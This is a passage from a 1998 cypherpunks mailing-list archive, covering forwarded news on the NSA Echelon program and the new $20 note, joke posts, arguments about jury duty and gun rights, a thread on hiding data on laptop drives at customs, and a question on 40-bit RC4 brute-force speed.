transferring all target information to Fort Meade," said the report.

`Powerful threat'

It warned that the NSA's tactics represent a "powerful threat to civil
liberties in Europe" at a time when more communication -- and
commerce -- is conducted electronically.

A preliminary version of the report circulated overseas in recent
months, touching off heated debate, with front-page stories in Italy,
France, Scotland, England, Belgium and even Russia.

The NSA won't discuss the report or even admit that the listening
post exists.

But this week, two days of debate in the European Parliament
continued the extraordinary public disclosure of comprehensive
post-Cold War spying by the agency. On Wednesday, the
Parliament passed a resolution seeking more accountability from such
eavesdropping arrangements and more assurances that they won't be
misused.

"We want to make sure that somebody's watching them," said Glyn
Ford, a British member of the European Parliament, the legislative
body for the 15-member European Union.

Observers say this was the first time a governmental body has
described in detail -- and then criticized -- the NSA's tactics.

"The cat's well and true out of the bag," said Simon Davies, director
of the London-based watchdog group Privacy International. "I would
argue that we have made the grandest step in 50 years toward
accountability of such national security transparencies."

The report describes a sophisticated program called Echelon, which
the NSA established in conjunction with British intelligence agencies.
The program includes a listening post in Menwith Hill, in Yorkshire,
whose satellite dishes soak up the satellite and microwave
transmissions carrying Europe's telephone conversations, faxes and
e-mail.

Unlike Cold War spying aimed at the military, Echelon is a global
electronic surveillance system that targets individuals, businesses,
governments and organizations, the report says.

The U.S. shares the information with Britain, Canada, Australia and
New Zealand as part of an intelligence-sharing agreement called
UKUSA. Each nation has its own set of key words, so it can seek
information on specific issues, the report states.

Europe is but a fraction of Echelon's target area -- and the Menwith
Hill post is one of at least 10 around the world, the report adds.

"One reason its a bigger deal over there than it is over here [in the
U.S.] is because the SIGINT [signals intelligence] systems are over
their heads and not our heads," said Jeffrey Richelson, an analyst
with the National Security Archives, a U.S. group seeking to
declassify intelligence related documents.

Echelon repercussions

But the disclosure of Echelon could soon resonate across the Atlantic
after the European Parliament action. Furthermore, it could
complicate current negotiations between the U.S. and the European
Union over encryption programs that scramble or encode computer
information, said Parliament member Ford.

The U.S. has been lobbying for back-door access to such codes for
security reasons.

Originally published on Sep 19 1998
-----------------------
NOTE: In accordance with Title 17 U.S.C. section 107, this material is
distributed without profit or payment to those who have expressed a prior
interest in receiving this information for non-profit research and
educational purposes only. For more information go to:
http://www.law.cornell.edu/uscode/17/107.shtml
-----------------------




**********************************************
To subscribe or unsubscribe, email:
     majordomo@majordomo.pobox.com
with the message:
     (un)subscribe ignition-point email@address
**********************************************
www.telepath.com/believer
**********************************************




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Thu, 24 Sep 1998 22:26:43 +0800
To: cypherpunks@cyberpass.net
Subject: IP: Funny Money: New $20 FRNs are here
Message-ID: <199809250327.UAA03904@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain




From: believer@telepath.com
Subject: IP: Funny Money: New $20 FRNs are here
Date: Thu, 24 Sep 1998 17:05:38 -0500
To: believer@telepath.com

Source:  US Newswire
http://www.usnewswire.com/topnews/Current_Releases/0924-109.txt

U.S. Treasury, Federal Reserve Issue New $20 Note 
U.S. Newswire
24 Sep 10:45

 U.S. Treasury, Federal Reserve Issue New $20 Note
 To: National and Financial Desks
 Contact: Hamilton Dix of the U.S. Department of the Treasury,
          202-622-2960, or
          Bob Moore of the Federal Reserve,
          202-452-3215

   WASHINGTON, Sept. 24 /U.S. Newswire/ -- Treasury Secretary Robert
E. Rubin and Federal Reserve Board Chairman Alan Greenspan today
announced the issuance of the redesigned $20 note, which includes new
and modified security features to deter counterfeiting of U.S.
currency.

   Rubin and U.S. Treasurer Mary Ellen Withrow marked the
issuance of the new notes in a ceremony at Treasury's Cash Room in
Washington, D.C. More than two dozen regional events hosted by
Federal Reserve banks and branches and major retailers were also
conducted around the country.

   "We have introduced a series of features that greatly raise the
hurdle for counterfeiters," Rubin said. "Together these features
amount to a formidable tool, and make spotting a counterfeit
note easier than ever. For them to be effective, it is important that
people stop for a moment to look for the new features."

   The new $20 will replace older notes gradually, and older series
$20 notes still in good condition will be recirculated. About
$83 billion worth of $20 notes is currently in circulation, 80
percent of those in the U.S. More than $450 billion worth of
U.S. currency circulates around the globe.

   The Series 1996 $20 note is the third U.S. currency note to be
redesigned to include new and modified security features. New $10 and
$5 notes are expected to be issued simultaneously in 2000, and a new
$1 note with a more modest redesign will follow.

   "We are confident that the introduction of this third redesigned
note will be as smooth as that of the $100 and $50 notes," Chairman
Greenspan said. "Older notes will not be recalled or devalued. All
existing notes will continue to be legal tender."

   Like the Series 1996 $100 and $50 notes introduced since 1996, the
new $20 note has a familiar appearance. The size, color and
historical subjects have not changed. It also incorporates several
security features that have proved effective against would-be
counterfeiters: a watermark; enhanced security thread; fine-line
printing patterns; color-shifting ink; and a larger, off-center
portrait that is the most noticeable change in the overall
architecture of the note. There are also two features for the blind
and visually impaired. The new $20 note includes a capability that
will allow the development of technology to help the blind ascertain
the denomination of their currency. In addition, the $20 and $50
notes have a large numeral on the back that make the notes easier for
millions of Americans with low vision to read.

   The continuing introduction of redesigned notes is a critical
component of the Federal government's anti-counterfeiting effort.
The new series aims to maintain the security of the nation's currency
as computerized reprographic technologies such as color copiers,
scanners and printers become more sophisticated and more readily
available. The $20 note is the most frequently counterfeited note in
the United States.

   Since the $20 note is so widely used in daily commerce and most
frequently dispensed by ATMs, broad nationwide recognition of the new
note when it is introduced will minimize apprehension on the part of
the public. A public education campaign now underway encourages the
public and people who handle cash every day to become familiar with
the design and security features of the new notes. Retailers and
financial institutions are educating their employees and customers by
sending posters to their outlets, training cashiers, offering
pamphlets to the public, and including information about the new note
in advertising circulars and on shopping bags. More than 100
constituency organizations have helped reach small business owners,
loss prevention managers, visually impaired and older Americans, and
others with a stake in the new note's introduction. U.S. embassies
and consulates are using materials translated into 15 languages to
conduct localized education outreach to ensure that local users of
U.S. currency as well as financial institutions are prepared for the
issuance of the new note.

   Fact sheets on the new note, the history of U.S. currency and
related agencies are available at http://www.moneyfactory.com.

 -0-
 /U.S. Newswire  202-347-2770/
 09/24 10:45

Copyright 1998, U.S. Newswire
-----------------------
NOTE: In accordance with Title 17 U.S.C. section 107, this material is
distributed without profit or payment to those who have expressed a prior
interest in receiving this information for non-profit research and
educational purposes only. For more information go to:
http://www.law.cornell.edu/uscode/17/107.shtml
-----------------------




**********************************************
To subscribe or unsubscribe, email:
     majordomo@majordomo.pobox.com
with the message:
     (un)subscribe ignition-point email@address
**********************************************
www.telepath.com/believer
**********************************************




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Thu, 24 Sep 1998 13:52:45 +0800
To: cypherpunks@cyberpass.net
Subject: No Subject
Message-ID: <199809241854.UAA27801@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



Just heard a tape of one of his radio appearences from Aug 1998. I'm not a
huge fan of country/filk music, but CJ is actually quite good. He
apparently wants a "Silly Horses In Trees" song on it to be passed along
to cypherpunks... --Declan






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Thu, 24 Sep 1998 21:55:20 +0800
To: cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Subject: Test [No Reply]
Message-ID: <199809250323.WAA17403@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Test [No Reply]




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Thu, 24 Sep 1998 19:15:34 +0800
To: cypherpunks@einstein.ssz.com
Subject: No Subject
Message-ID: <199809250013.CAA24949@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



At 10:38 AM 9/23/98 -0500, Jim Choate wrote:
>
>It becomes possible to scan for sureptitous clock devices (their tick, tick,
>tick in the EM), mod'ed hardware, and software.
>
>Follow this with a gas spectrograph and a x-ray and you'd have the vast
>majority of bases covered.

"Ummmm...I left my laptop in a room full of Canadian snowboarders...dude"












  







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Thu, 24 Sep 1998 19:24:36 +0800
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <199809250013.CAA24957@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



GOD'S TOTAL QUALITY MANAGEMENT QUESTIONNAIRE

God would like to thank you for your belief and patronage. In order to
better serve your needs, God asks that you take a few moments to answer the
following questions.

Please keep in mind that your responses will be kept completely
confidential, and that you need not disclose your name or address unless
you prefer a direct response to comments or suggestions.

1. How did you find out about your deity?
__ Newspaper
__ Bible
__ Torah
__ Television
__ Book of Mormon
__ Divine Inspiration
__ Dead Sea Scrolls
__ My Mama Done Tol' Me
__ Near Death Experience
__ Near Life Experience
__ National Public Radio
__ Tabloid
__ Burning Shrubbery
__ Other (specify): _____________

2. Which model deity did you acquire?
__ Yahweh
__ Father, Son & Holy Ghost [Trinity Pak]
__ Jehovah
__ Jesus
__ Krishna
__ Zeus and entourage [Olympus Pak]
__ Odin and entourage [Valhalla Pak]
__ Allah
__ Satan
__ Gaia/Mother Earth/Mother Nature
__ None of the above, I was taken in by a false god

3. Did your God come to you undamaged, with all parts in good working order
and with no obvious breakage or missing attributes?
__ Yes __ No
If no, please describe the problems you initially encountered here. Please
indicate all that apply:
__ Not eternal
__ Finite in space/Does not occupy or inhabit the entire cosmos
__ Not omniscient
__ Not omnipotent
__ Not infinitely plastic (incapable of being all things to all creations)
__ Permits sex outside of marriage
__ Prohibits sex outside of marriage
__ Makes mistakes (Geraldo Rivera; Michael Jackson)
__ Makes or permits bad things to happen to good people
__ When beseeched, does not stay beseeched
__ Requires burnt offerings
__ Requires virgin sacrifices

4. What factors were relevant in your decision to acquire a deity? Please
check all that apply.
__ Indoctrinated by parents
__ Needed a reason to live
__ Indoctrinated by society
__ Needed focus in whom to despise
__ Imaginary friend grew up
__ Wanted to know Jesus in the Biblical sense
__ Hate to think for myself
__ Wanted to meet girls/boys
__ Fear of death
__ Wanted to piss off parents
__ Needed a day away from work
__ Desperate need for certainty
__ Like Organ Music
__ Need to feel Morally Superior
__ Thought Jerry Falwell was cool
__ Shit was falling out of the sky
__ My shrubbery caught fire and a loud voice commanded me to do it

5. Have you ever worshipped a deity before? Is so, which false god were you
fooled by? Please check all that apply.
__ Mick Jagger
__ Cthulhu
__ Baal
__ The Almighty Dollar
__ Bill Gates
__ Left Wing Liberalism
__ The Radical Right
__ Ra
__ Beelzebub
__ Barney T.B.P.D.
__ The Great Spirit
__ The Great Pumpkin
__ The Sun
__ Elvis
__ Cindy Crawford
__ The Moon
__ A burning shrubbery
__ Other: ________________

6. Are you currently using any other source of inspiration in addition to God?
Please check all that apply.
__ Tarot
__ Lottery
__ Astrology
__ Television
__ Fortune cookies
__ Ann Landers
__ Psychic Friends Network
__ Dianetics

__ Palmistry
__ Playboy and/or Playgirl
__ Self-help books
__ Sex, Drugs, Rock and Roll

__ Biorhythms
__ Alcohol
__ Bill Clinton
__ Tea Leaves
__ EST
__ The Internet
__ Mantras
__ Jimmy Swaggert
__ Crystals (not including Crystal Gayle)
__ Human Sacrifice
__ Pyramids
__ Wandering around a desert
__ Insurance policies
__ Burning Shrubbery
__ Barney T.B.P.D.
__ Teletubbies
__ Other:_____________________
__ None

7. God employs a limited degree of Divine Intervention to preserve the
balanced level of felt presence and blind faith.
Which would you prefer (circle one)?
a. More Divine Intervention
b. Less Divine Intervention
c. Current level of Divine Intervention is just right
d. Don't know...what's Divine Intervention?

8. God also attempts to maintain a balanced level of disasters and miracles.
Please rate on a scale of 1 - 5 his handling of the following:
(1=unsatisfactory, 5=excellent):
A. Disasters:
flood 1 2 3 4 5
famine 1 2 3 4 5
earthquake 1 2 3 4 5
war 1 2 3 4 5
pestilence 1 2 3 4 5
plague 1 2 3 4 5
SPAM 1 2 3 4 5
AOL 1 2 3 4 5

b. Miracles:
rescues 1 2 3 4 5
spontaneous remissions 1 2 3 4 5
stars hovering over jerkwater towns 1 2 3 4 5
crying statues 1 2 3 4 5
water changing to wine 1 2 3 4 5
walking on water 1 2 3 4 5
VCRs that set their own clocks 1 2 3 4 5
Saddam Hussein still alive 1 2 3 4 5
getting any sex whatsoever 1 2 3 4 5

9. Do you have any additional comments or suggestions for improving the
quality of God's services? (Attach an additional sheet if necessary):

If you are able to complete the questionnaire and return it to one of Our
conveniently located drop-off boxes by July 30 you will be entered in The
One Free Miracle of Your Choice drawing (chances of winning are
approximately one in 6.023 x 10 to the 23rd power, depending on number of
beings entered).

Thank You,
Daryl
Clerk of the Supreme Being of the Apocalypse







  







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Thu, 24 Sep 1998 19:13:01 +0800
To: cypherpunks@Algebra.COM
Subject: No Subject
Message-ID: <199809250013.CAA24987@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



At 01:54 AM 9/24/98 -0000, Anonymous wrote:
>There is an inherent flaw in the jury system. You get summoned and are
>legally required to blow the entire day down at the courthouse. If you're
>a student you miss classes, and if you have a job you miss that too. You
>have to pay for transportation, parking, food, and whatever else you need. 
>In return, you get paid something like $3, which often isn't even enough
>to cover the parking and get told every five minutes that this or that
>will get you, as a juror or potential juror, thrown in jail.

Basically this is unconstitutional seizure of your time = money.
This is slavery, which is prohibited, again by that pesky constitution.

The postal service sends datagrams; they are not acknowledged.

But you can't subvert if you don't participate.








  







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Thu, 24 Sep 1998 19:11:56 +0800
To: cypherpunks@Algebra.COM
Subject: No Subject
Message-ID: <199809250014.CAA25085@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



At 07:01 AM 9/23/98 -0500, Bruce Schneier wrote:
>
>Sorry.  I am under NDA.  

Be sure to drink plenty of fluids and get
plenty of rest afterwards; that stuff
wears you out ;-)








  







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Thu, 24 Sep 1998 21:14:58 +0800
To: cypherpunks@Algebra.COM
Subject: Re: Jury duty considered harmful, or at least rare
Message-ID: <199809250216.EAA02681@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



On Tue, 22 Sep 1998, Rabid Wombat wrote:

> On 24 Sep 1998, Anonymous wrote:
> 
> > On Wed, 23 Sep 1998, Tim May wrote:
> > 
> > > 
> > > At 11:11 PM -0700 9/22/98, Bill Stewart wrote:
> > > 
> > 
> 
> > If they do have a list, I'd kind of like to be on it. I'm a college
> > student, and I _can't_ serve on a jury for more than a day or so. The same
> > goes for doctors, corporate executives, and others.
> > 
> 
> Yeah, right. I *never* blew off class to go to the beach. I never go to
> "meetings" on the golf course, either. Glad to hear the only people with
> important places to be are doctors, executives, and college students. 

Maybe you skipped class all the time. Maybe you didn't have to compete to
get into a competitive graduate school or graduate from that school. Maybe
you hold your "meetings" on the golf course and cheat your company. I
don't. That isn't the point.

Glad to hear that you make a habit of blowing off class and playing golf
on company time. 

Snip. 

>  Oh, and I need
> > to still get my full salary to pay my bills. Thanks, buddy." Um, no.
> > 
> 
> The company I work for pays our salary while we are on jury duty. We have 
> to turn over the $3 a day stipend.

That's nice for people who work at your company. It won't work for a small
business where the juror own and operates it. It also won't work for a
small business owner to hire more help and still pay the juror, because
then it's cheating the owner.

The court system summons the people under penalty of law. The court system
puts them on a jury. The government isn't repealing all the bullshit
legislation. The government can pay the bills. Can't afford it? Maybe we
should redirect some of that welfare money. 

> Most defendants are guilty. That doesn't mean the one in front of you is. 
> Take traffic court as an example. How many defandants are there because
> they are innocent, and the cop was mistaken, didn't calibrate his radar,
> needed to fill his quota, etc.? A few. How many are there because they
> want a couple points knocked off the penalty, even theough they were
> speeding? Most of them. A guilty defendant is entitled to a fair trial. So
> is an innocent one.  You don't help the process by ducking jury duty (or
> are you one of the stupid people?). 

That's primarily because of all the bullshit laws and legal events we
have: drug laws, computer crime laws, frivolous lawsuits, set-ups by the
cops, ITAR/EAR, and other things along that line of thought.

The last time I was called for jury duty was back in college, where they
got me in the week of finals. Of course, they hit me on that day, so I
have to jump through all sorts of hoops and seriously piss a couple of
professors off. Nothing keeps those professors from giving somebody like
that a harder final either, under the pretense that they might have talked
to others in the class about what the questions and answers were, which
means that their grades relative to others in the class are then skewed,
but the curve is still applied to them. Repeat with similar situations for
any profession which isn't like canning at a tomato sauce plant.

How many people do you think are found guilty because 11 people in the
jury think he should be, and 1 person in the jury thinks the law shouldn't
even be there but lets it go because the other 11 people on the jury don't
understand the concept of jury nullification, they all just want to go
home and not keep losing their livelihood, it *is* the law no matter how
unconstitutional it may be, and the offense is relatively minor anyway?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Albert P. Franco, II" <apf2@ctv.es>
Date: Wed, 23 Sep 1998 21:35:23 +0800
To: cypherpunks@Algebra.COM
Subject: From Spyking: DNA Technology
Message-ID: <3.0.3.32.19980925043213.006a2374@pop.ctv.es>
MIME-Version: 1.0
Content-Type: text/plain



>Date: Wed, 23 Sep 1998 09:26:47 -0400
>From: Sunder <sunder@brainlink.com>

>5) From: "Timothy Robarts" <t.robarts@btinternet.com> 
>Subject: DNA Technology
>
>London 16/09/98
> 
>September 16 1998
>
>Police Superintendents' Conference: Stewart Tendler on how science is
catching
>up with the criminal. 
>
>Dr Sullivan, who worked on the identification of the remains of the last
Tsar,
>Nicholas II, said that the breakthrough in taking DNA samples from dandruff
>would allow investigators to take material from the tiny particles of human
>skin that are found at every scene. He said: "People are constantly shedding
>skin cells. The majority of household dust is made up of dead skin and we
know
>we can get DNA from an individual skin cell." 
>
If human skin cells comprise the majority of household dust, and dust can
so easily move from place to place, then how will they defend against the
claim that the suspect passed near by (five blocks away) six months ago and
the dust must have slowly made it's way to the crime scene...

Don't answer...I know...truth is not the objective, rather conviction of
the target. Now they'll have the tools to do it. The same cop investigating
your car this month could inadvertently (or not) deposit a few traces of
your skin dust at the scene of a crime next month. They keep getting
scarier all the time!

Al Franco, II




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Albert P. Franco, II" <apf2@ctv.es>
Date: Wed, 23 Sep 1998 21:53:49 +0800
To: cypherpunks@Algebra.COM
Subject: Re: Stego-empty hard drives... (fwd)
Message-ID: <3.0.3.32.19980925045548.0069dbbc@pop.ctv.es>
MIME-Version: 1.0
Content-Type: text/plain



>From: Jim Choate <ravage@einstein.ssz.com>
>> From: "Albert P. Franco, II" <apf2@ctv.es>
>
>> I can't imagine that anyone that wasn't already sure that you were playing
>> tricks with the HD would be able to detect either of these on a normal
>> startup. Again I think the key is that it would vastly expensive and very
>> time consuming for customs services to make more than a cursory check. More
>> and more people are carrying notebooks with them on trips and just like
>> most bag searching has ended due to very fast, but not perfect, technology,
>> notebook scanning is limited by the very important public factor--the
>> people waiting in line behind you will tend to get very anxious. :)
>
>That's a rationale for doing TEMPEST scanning I hadn't thought of. Since it
>is time consuming and takes special training (which means higher personel
>budgets that don't amortise over time like hardware) to operate a floppy
>scanner and interpet the results there are budget forces involved.
>

I snipped the rest, but your point ignores that they still have to scan my
hard drive for what they are looking for. So TEMPEST on top of the other
measures just makes things slower. Also the vast variety of computers and
clock speeds on the market today would make a 30 byte (10-20 clock cycles
... )BIOS patch virtually undetectable. Again...UNLESS they want YOU in
particular. 

I would be more concerned about a Unix-like OS on their disk-following THEM
to bypass my BIOS to read the HD. Of course, perhaps another way around
this may be to carry a couple copies of an NDA and an Acceptance of
Liability for Damages Caused contract. Tell the stooge at the counter that
your machine contains highly valuable commercial information and that if
it's damaged in any way, shape or form he/she will be held personally
liable. Offer the two documents for his/her signature as you explain that
since the procedure they intend to use is so fool proof (the stooge is sure
to quote the party line...) this would only strengthen your case that
damage or discloser to/of contents must be a direct result of negligence or
criminal intent on the part of the stooge.

"If you can't dazzle 'em with brilliance, baffle 'em with bullshit." It
works for Clinton!

Al Franco, II




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Fri, 25 Sep 1998 01:24:19 +0800
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <199809250615.IAA18004@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



Friday, September 25, 1998 - 08:08:49 MET
You know for what the acronym CLINTON stands for  ?
Call Lewinsky, I Need The Oral Now !




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Petro <petro@playboy.com>
Date: Fri, 25 Sep 1998 09:38:33 +0800
To: cypherpunks@toad.com
Subject: Re: sex, lies, and videotape
In-Reply-To: <199809230415.GAA08895@replay.com>
Message-ID: <v04011707b231570298b5@[206.189.103.244]>
MIME-Version: 1.0
Content-Type: text/plain



At 11:10 AM -0500 9/24/98, Bill Stewart wrote:

>It's not clear if this includes the picture
>of Orrin Hatch that's rumoured to be floating around Salt Lake.
>
	Gif! Gif!
--
petro@playboy.com----for work related issues. I don't speak for Playboy.
petro@bounty.org-----for everthing else.      They wouldn't like that.
                                              They REALLY
Economic speech IS political speech.          wouldn't like that.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Petro <petro@playboy.com>
Date: Fri, 25 Sep 1998 09:35:34 +0800
To: cypherpunks@Algebra.COM
Subject: Re: Jury duty considered harmful, or at least rare
In-Reply-To: <v04011700b2300baeca3f@[206.189.103.244]>
Message-ID: <v04011708b23158ef0c9a@[206.189.103.244]>
MIME-Version: 1.0
Content-Type: text/plain



At 10:01 PM -0500 9/24/98, James A. Donald wrote:
>    --
>At 9:12 PM -0500 9/23/98, James A. Donald wrote:
>> > To rig a jury by excluding undesirables such as Tim May
>> > would be far too laborious.  To rig a jury it would be
>> > necessary to
>
>At 09:52 AM 9/24/98 -0500, Petro wrote:
>> No, no, On the contrary, far too easy.
>>
>> There are certain people who are NEVER called to jury duty,
>> people convicted of felonies & etc. simply put the name of
>> an undesirable on this list,
>
>The number of identifiable undesirables is too small to
>guarantee the desired trial outcome.  To ensure a desired
>outcome it would be necessary to screen out a very large
>number of potential undesirables.  It would be much easier to
>screen in a small number of desirables.

	At first yes, but over time the list could/would be grown. Also,
the list of non-criminal undersirables is _only_ those people who would
WANT to serve on the jury, but are too smart/savy/stubborn to pant at the
feet of the lawyers.
--
petro@playboy.com----for work related issues. I don't speak for Playboy.
petro@bounty.org-----for everthing else.      They wouldn't like that.
                                              They REALLY
Economic speech IS political speech.          wouldn't like that.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Fri, 25 Sep 1998 09:21:10 +0800
To: cypherpunks@toad.com
Subject: EU-US Relations and Spy Satellit
Message-ID: <199809251410.KAA06539@dewdrop2.mindspring.com>
MIME-Version: 1.0
Content-Type: text/plain



http://www.europarl.eu.int/dg3/sdp/pointses/en/p980914s.htm#6

EU-US relations and spy satellite

Monday 14 September

MEPs adopted the resolution emphasising the importance of EU-US 
relations and welcoming the New Transatlantic Agenda agreed at 
the 18 May London Summit. MEPs see the agreement as a means of 
reducing potential sources of conflict between both sides but
want Congress to scrap the extra-territorial Helms-Burton and 
d'Amato Acts. The resolution recognises the importance of 
cooperation in the field of electronic surveillance for tracking 
down international criminal terrorists and drug traffickers but 
takes the view that "protective measures concerning economic 
information and effective encryption" should be taken to guard 
against abuse and threat to civil liberties posed by international
telecommunications such as the "Echelon" US system. 

-----

We were unable to find the full resolution online and would 
appreciate a pointer, or a hardcopy:

US Fax: 212-873-8700

Snail:

John Young
251 West 89th Street, Suite 6E
New York, NY 10024

No response from DoD on our request to interview Secretary
Cohen about Echelon. And despite the spate of news reports
on the recent Euro Parliament debate about it, there have been
no questions about Echelon in DoD press briefings.

Perhaps one of our esteemed journalists with Pentagon links
could follow up on the Baltimore Sun coverage.

Duncan Campbell, the first to write of Echelon in 1988, is
offering information on Menwith Hill (NSA Echelon base) 
obtained by British protestors:

   http://jya.com/en092198.htm






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Jean-Francois Avon" <jf_avon@citenet.net>
Date: Fri, 25 Sep 1998 10:14:26 +0800
To: "Cypherpunks" <hjwiesner@uni-tuebingen.de>
Subject: [flames] a clueless can't see parallel between crypto-freedom and 2nd amendment...
Message-ID: <199809251459.KAA08436@cti06.citenet.net>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

From: jf_avon@citenet.net
Date: 25 sept 98  10h57 EST
Topic: [flames] a clueless can't see parallel between crypto-freedom
and 2nd amendment...

On Fri, 25 Sep 1998 10:11:10 +0200, Hans-Juergen Wiesner wrote:

Your comment is the first and only one complaint I ever received while
posting on this subject.  OTOH, I occasionnally receive mail to either
objectively discuss the topic or to comment in a positive ways my
posts.

Beside, post to the owner-cypherpunks to your hearth content, I am
not, as of a few weeks ago, on the list.  I jump in and off depending
on my time availability.


>At 14:53 24.09.98 -0400, you wrote:
>>   ====== forwarded from Canadian Firearms Digest, V2 # 605
==========
>
>I won't comment on your somewhat distortet view on reality and your
>miserable sense of logic proven by your "arguments".

Please submit me with your valid data.  I'll welcome it.

> I won't even lose a
>word on your misuse of HTML instead of plain ASCII for sending mail.

Then, don't... 

>It's just that I don't know why you distribute your meaningless
factoids by
>way of mailing lists like Cypherpunks (which is how I'm bothered by
your
>postings every single day).

Please feel free to enlighten me about reality and debunk my factoids.

As for why I fwd to the Cypherpunks, ask Tim May about the link
between govt trying to ban guns and govt trying to ban strong crypto. 
Or even better than bothering Tim, go back an read the archives of
Cypherpunks...


> Cypherpunks is a mailing list for users of 
>cryptographic technology. Topics are concerned mainly with software
and the
>implications of using certain programs.

Mainly.  But it is also *highly* concerned by the ethics and politics
of it.  Guns and crypto are, at the abstraction level, extremely
similar and therefore, it is not surprizing to see govt react the same
to both topic.  

An individual's specific psycho-epistemology and definition of Man
will, usually, lead to the same conclusions on theses two apparently
different topics. 

>Arms,which seem to be YOUR concern, are for shooting people or game.

Arms are NOT my concern, my concern is Freedom.  Guns are not for
anything in particular, they *are*.  Your choice to prefer to shoot
peoples than game or targets or simply to engineer a  more performing
piece of hardware is what you choose to do with it.  And is happens
that by the nature of them, e.g. the capacity to exert coercion at a
distance, they are the ultimate tools of choice of governments, which
by nature, are coercives.  Govts have their roles.  History has shown
over and over again ad nauseaum that govts are *dangerous* entities if
taken over by a certain category of individuals.

In order to defend the freedom of the individual, guns, i.e. tools of
tele-coercion are the ultimate deterrent.  Ask any american about it. 
Or consult the Constitution of the United States and see Thomas
Jefferson's explanation for the reason of the second ammendment.

>think this difference is big enough to justify my asking you to post
your
>stuff elsewhere.

I suppose you ignore that crypto is ruled by ITAR in North-America and
that the liberty-to-own-guns advocates also have their grips with ITAR
?

>I don't want to be bothered by unsolicited junk mail like
>yours any more.

when you sent the line subscribing line to the majordomo
subscribe cypherpunk-unedited hjwiesner@uni-tuebingen.de,  which
letters of the word "unedited" did you not understand?

There is *a lot* of junk mail coming from the cypherpunks list and my
posts represent my opinion, which in itself is legitimate,  an facts
obtained from the Royal Canadian Mounted Police itself.

If you don't want to receive any junk mail, send an e-mail to
majordomo@toad.com, leave the subject line blank and send the
following message:

unsubscribe cypherpunks-unedited hjwiesner@uni-tuebingen.de

Ciao

jfa
[note: when I post to gun groups, I use a crypto-oriented .sig and
when I post to crypto groups, I usually use a gun-oriented .sig.]

-----BEGIN PGP SIGNATURE-----
Version: PGPfreeware 5.5.3i for non-commercial use <http://www.pgpi.com>

iQEVAwUBNguvx8iycyXFit0NAQGhqgf9G3Kl3NR2rPac87kQJlx3meMSmU6NM5G6
gx3OElO+LHQw2beD0WOTD1Lj6whLIit0oW/I6uJqHKWhnYAjCM9jm8+REQdiY2Ge
s3ISQmSGNyf3rARWIPA6ecrJsMCLJy3vJD60HDtanq4/5GXZTp2Xq3iEOMbLjkp9
36z53e4E0IcF2Betyg2gpyrPajm7cFCv066mSPpUZaEUqG9PwmLRxNYyn03A9bSV
PAkUKwyZ/MZy+CHwyuR5lfCPojOuFuFPzA0UINdD6GVk+OK5Gm6ys+GKAcV00SBL
y5gqTyGI4Y29nuYiUn27q3dXORxtw4+vbccBqnoonkAmReH+T4lGXA==
=AuSQ
-----END PGP SIGNATURE-----


Definition:  FASCISM: n.:  a political and economic movement, strongly nationalistic, magnifying the rights of the state as opposed to those of the individual, in which industry, though remaining largely under private ownership, and all administrative
political units, are controlled by a strong central government.
        -------------------------------------------------
"One of the ordinary modes by which tyrants accomplish their purpose, without resistance, is by disarming the people and making it an offense to keep arms".  - Joseph Story, U.S. Supreme Court Justice.
        -------------------------------------------------
the German gun control laws were enacted by the "liberal" Weimar Republic government that preceded Hitler, and were a strong aid to his coming to power -- because they disarmed Hitler's opponents, and Hitler's adherents ignored them -- as criminals have always ignored gun control laws.

Disarming the public is a frequent first step toward dictatorships and genocides.  Once the disarming is complete, the public is helpless against those who have the guns.        -------------------------------------------------

PGP keys: http://bs.mit.edu:8001/pks-toplev.html
PGP ID:C58ADD0D:529645E8205A8A5E F87CC86FAEFEF891 
PGP ID:5B51964D:152ACCBCD4A481B0 254011193237822C





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dan McDonald <danmcd@Eng.Sun.COM>
Date: Fri, 25 Sep 1998 13:39:09 +0800
To: cypherpunks@toad.com
Subject: 40-bit brute force RC4 speed records?
Message-ID: <199809251826.LAA09275@kebe.eng.sun.com>
MIME-Version: 1.0
Content-Type: text/plain



Just curious, what's the speed record?  What if I had, oh, say, a 4-way Ultra
Enterprise 450 at my disposal?

Thanks,
Dan




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Burnes <jvb@ssds.com>
Date: Fri, 25 Sep 1998 13:45:12 +0800
To: Pat Cain <moftsd@idcomm.com>
